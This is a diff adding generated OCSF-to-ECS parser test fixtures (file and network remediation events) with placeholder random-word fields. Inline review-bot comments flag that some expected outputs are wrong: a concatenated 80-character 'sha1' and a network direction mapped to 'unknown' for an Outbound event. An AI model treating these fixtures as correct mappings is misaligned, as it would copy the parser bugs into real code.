\"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}" + }, + "expected": { + "message": "{\"status\": \"Does Not Exist\", \"time\": 1731328594225, \"file\": {\"name\": \"html.pkg\", \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"canyon upgrading wool/marco.fla/html.pkg\", \"ext\": \"honest borough graduated\", \"type_id\": 5, \"mime_type\": \"pr/anything\", \"parent_folder\": \"canyon upgrading wool/marco.fla\", \"confidentiality\": \"prisoner fought submission\", \"hashes\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"older bangladesh caused\", \"version\": \"1.3.0\", \"lang\": \"en\", \"cpe_name\": \"m ryan proof\", \"url_string\": \"web\", \"vendor_name\": \"directed villas incorrect\"}, \"labels\": [\"range\", \"mild\"], \"profiles\": [], \"event_code\": \"ethnic\", \"log_name\": \"wisconsin scenes croatia\", \"log_provider\": 
\"consolidated month mil\", \"logged_time\": 1731328594209, \"loggers\": [{\"name\": \"generated dale subsection\", \"version\": \"1.3.0\", \"device\": {\"owner\": {\"name\": \"Chapter\", \"type\": \"User\", \"uid\": \"95fb04dc-a029-11ef-9566-0242ac110007\", \"type_id\": 1, \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"type\": \"IOT\", \"os\": {\"name\": \"polls knew problem\", \"type\": \"Windows\", \"type_id\": 100, \"cpe_name\": \"architects letting hay\"}, \"desc\": \"tradition automated mysql\", \"hostname\": \"meters.edu\", \"uid\": \"95faf0a0-a029-11ef-a3c0-0242ac110007\", \"image\": {\"name\": \"ace tracy webshots\", \"path\": \"joined also europe\", \"uid\": \"95fbbb16-a029-11ef-9965-0242ac110007\"}, \"groups\": [{\"uid\": \"95faa5fa-a029-11ef-b64e-0242ac110007\"}], \"type_id\": 7, \"imei\": \"summary ieee rated\", \"interface_name\": \"marsh shopper guides\", \"interface_uid\": \"95fa9074-a029-11ef-931d-0242ac110007\", \"region\": \"accepting sword tab\", \"risk_level\": \"High\", \"risk_level_id\": 3, \"risk_score\": 4, \"zone\": \"ability footage nt\"}, \"product\": {\"name\": \"quote licence channel\", \"version\": \"1.3.0\", \"uid\": \"95fc351e-a029-11ef-87b2-0242ac110007\", \"feature\": {\"name\": \"adequate drainage dear\", \"version\": \"1.3.0\", \"uid\": \"95fc4cd4-a029-11ef-9a35-0242ac110007\"}, \"url_string\": \"makes\", \"vendor_name\": \"hybrid licensing faster\"}, \"uid\": \"95fc5602-a029-11ef-9902-0242ac110007\", \"log_name\": \"vegas cave greatly\", \"log_provider\": \"ieee cancer pharmaceuticals\", \"logged_time\": 1731328594222}, {\"name\": \"hostels given kill\", \"version\": \"1.3.0\", \"product\": {\"name\": \"css ks demonstrate\", \"version\": \"1.3.0\", \"uid\": \"95fc6b06-a029-11ef-b5a5-0242ac110007\", \"lang\": \"en\", \"url_string\": \"alternatives\", \"vendor_name\": \"television preventing blades\"}, \"uid\": \"95fc72c2-a029-11ef-994a-0242ac110007\", \"log_provider\": \"alignment free mines\", \"logged_time\": 
1731328594222}], \"original_time\": \"drill blogs lemon\", \"processed_time\": 1731328594222, \"tenant_uid\": \"95fc7d12-a029-11ef-bfaa-0242ac110007\"}, \"severity\": \"illustrations\", \"duration\": 559843632, \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"observables\": [{\"name\": \"chen architects purchased\", \"type\": \"File\", \"type_id\": 24}, {\"name\": \"controlling sublime bp\", \"type\": \"URL String\", \"type_id\": 6}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 58, \"activity_name\": \"Evict\", \"command_uid\": \"95fcdc6c-a029-11ef-acb7-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fc9ff4-a029-11ef-8605-0242ac110007\"}, \"d3f_technique\": {\"name\": \"determine wanting pursuant\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"95fcb016-a029-11ef-9ed4-0242ac110007\"}, \"d3f_technique\": {\"name\": \"cw drama their\", \"uid\": \"95fcbd7c-a029-11ef-ba3c-0242ac110007\", \"src_url\": \"organize\"}}], \"enrichments\": [{\"data\": \"cluster\", \"name\": \"settlement ia sega\", \"type\": \"surfaces registrar sizes\", \"value\": \"seq excuse nearest\", \"created_time\": 1731328594225, \"provider\": \"lesson prev champion\", \"reputation\": {\"base_score\": 15.2963, \"provider\": \"northern prep older\", \"score\": \"May not be Safe\", \"score_id\": 5}, \"short_desc\": \"travel glasses agencies\", \"src_url\": \"fly\"}, {\"data\": \"mpegs\", \"name\": \"mentor glasgow mistress\", \"type\": \"email newest household\", \"value\": \"vpn tape med\", \"created_time\": 1731328594225, \"short_desc\": \"anything fatty capital\", \"src_url\": \"saint\"}], \"severity_id\": 99, \"status_detail\": \"mistake schedule propecia\", \"status_id\": 3}", + "event": { + "action": "evict", + "category": [], + "code": "ethnic", + "duration": 559843632000000, + "provider": 
"consolidated month mil", + "severity": 99, + "type": [] + }, + "@timestamp": "2024-11-11T12:36:34.225000Z", + "file": { + "directory": "canyon upgrading wool/marco.fla", + "hash": { + "ssdeep": "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + }, + "mime_type": "pr/anything", + "name": "html.pkg", + "path": "canyon upgrading wool/marco.fla/html.pkg", + "type": "Local Socket" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_2.json b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json new file mode 100644 index 000000000..9af77e1ab --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_2.json 
@@ -0,0 +1,39 @@ +{ + "input": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": 
\"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}" + }, + "expected": { + "message": "{\"message\": \"oils tissue non\", \"status\": \"bottle threads desktop\", \"time\": 1731328621430, \"file\": {\"attributes\": 77, \"name\": \"panama.jsp\", \"type\": \"Unknown\", \"version\": \"1.3.0\", \"path\": \"sage petite tracy/supplement.deskthemepack/panama.jsp\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"issuer\": \"shaw further heaven\", \"fingerprints\": [{\"value\": \"25CF2FBFB6A4C58B9886BFD82A9D9D32976450F5B95B193B1F8F91071FCE9032\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731328621426, \"expiration_time\": 1731328621426, \"serial_number\": \"museum every fa\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"sims faculty argue\", \"uid\": \"a6338964-a029-11ef-9cb6-0242ac110007\", \"type_id\": 0, \"parent_folder\": \"sage petite tracy/supplement.deskthemepack\", \"accessed_time\": 1731328621427, \"hashes\": [{\"value\": \"1051E22C1288CD1DD4B35D7D119F9D9E764B37C2050E8086C3F8AADBE48E8459\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": 
\"2A598E60AFB25F3005C1949A4AE28E75A5E24C34375D709852748D46D50E19DBF4AD93722613E77084B214B0C8F931F2EFF7B1AA9AF17B97F3D50770D0C328DB\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"determine italia plenty\", \"version\": \"1.3.0\", \"uid\": \"a6331254-a029-11ef-a2ea-0242ac110007\"}, \"product\": {\"name\": \"board actor feels\", \"version\": \"1.3.0\", \"uid\": \"a6334788-a029-11ef-8ba2-0242ac110007\", \"vendor_name\": \"resume himself vitamin\"}, \"uid\": \"a63350e8-a029-11ef-91d8-0242ac110007\", \"profiles\": [], \"correlation_uid\": \"a63357c8-a029-11ef-a1d1-0242ac110007\", \"log_name\": \"movements amazing murphy\", \"log_provider\": \"suggests assure sacred\", \"original_time\": \"narrative shed quit\", \"tenant_uid\": \"a63361a0-a029-11ef-b41a-0242ac110007\"}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700204, \"type_name\": \"File Remediation Activity: Harden\", \"observables\": [{\"name\": \"font earlier construction\", \"type\": \"Hash\", \"type_id\": 8}, {\"name\": \"outdoors de otherwise\", \"type\": \"Unknown\", \"type_id\": 0}], \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"timezone_offset\": 94, \"activity_name\": \"Harden\", \"command_uid\": \"a6340542-a029-11ef-ab83-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a633df68-a029-11ef-b6df-0242ac110007\"}, \"d3f_technique\": {\"name\": \"tgp adrian reject\", \"uid\": \"a633ef26-a029-11ef-ae66-0242ac110007\", \"src_url\": \"productions\"}}], \"severity_id\": 3, \"status_code\": \"lover\", \"status_detail\": \"declared chassis nominations\"}", + "event": { + "action": "harden", + "category": [], + "provider": "suggests assure sacred", + "reason": "oils tissue non", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:01.430000Z", + "file": { + 
"accessed": "2024-11-11T12:37:01.427000Z", + "directory": "sage petite tracy/supplement.deskthemepack", + "inode": "a6338964-a029-11ef-9cb6-0242ac110007", + "name": "panama.jsp", + "path": "sage petite tracy/supplement.deskthemepack/panama.jsp", + "type": "Unknown", + "x509": { + "issuer": { + "distinguished_name": "shaw further heaven" + }, + "not_after": "2024-11-11T12:37:01.426000Z", + "serial_number": "museum every fa", + "version_number": "1.3.0" + } + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "File Remediation Activity", + "class_uid": 7002 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_file_remediation_activity_3.json b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json new file mode 100644 index 000000000..35f27d49f --- /dev/null +++ b/OCSF/ocsf/tests/generated_file_remediation_activity_3.json 
@@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides 
trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": 
\"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}", + "event": { + "action": "evict", + "category": [], + 
"provider": "sections sides trembl", + "reason": "baker testimonials approx", + "severity": 0, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:07.583000Z", + "file": { + "directory": "violin economic czech/regular.accdb", + "hash": { + "sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + }, + "mime_type": "agree/diego", + "name": "brazilian.tar.gz", + "owner": "Enrolled", + "path": "violin economic czech/regular.accdb/brazilian.tar.gz", + "type": "Regular File", + "uid": "a9de1552-a029-11ef-9be5-0242ac110007" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + ], + "user": [ + "Enrolled" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_1.json b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json new file mode 100644 index 000000000..4209eb1be --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json 
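Review bot: The expected `file.hash.sha1` (and the matching `related.hash` entry) is the two SHA-1 values from the input `hashes` array concatenated into one 80-hex-character string, so this fixture pins a value that can never match a real SHA-1 indicator. The code that builds `file.hash.sha1` is in the parser, outside this diff, but the expected output should be a single 40-hex-character digest, e.g. `"sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D"`, with the second value dropped or kept as its own `related.hash` entry. As written, the fixture will lock the concatenation in once the test suite is green.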
@@ -0,0 +1,29 @@ +{ + "input": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": 
\"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", 
\"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}", + "event": { + "action": "restore", + "category": [], + "provider": "expertise browse courier", + "reason": "kills routine cookie", + "severity": 4, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:44.401000Z", + "network": { + "direction": [ + "unknown" + ], + "iana_number": "62" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_2.json b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json new file mode 100644 index 000000000..afc4afcbe --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json 
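Review bot: The expected `network.direction` is `["unknown"]` although the input `connection_info` carries `direction: Outbound` and `direction_id: 2`, so this fixture pins a lossy mapping; ECS `network.direction` should be `outbound` for this event. The mapping lives in the parser, outside this diff, but the expected line should become `"direction": ["outbound"]` (or the scalar `"outbound"`, since ECS defines the field as a single keyword) once the parser is corrected. The second network fixture in this commit carries a `direction: Inbound` input and presumably shows the same issue, but its hunk is cut off here.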
@@ -0,0 +1,30 @@ +{ + "input": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, 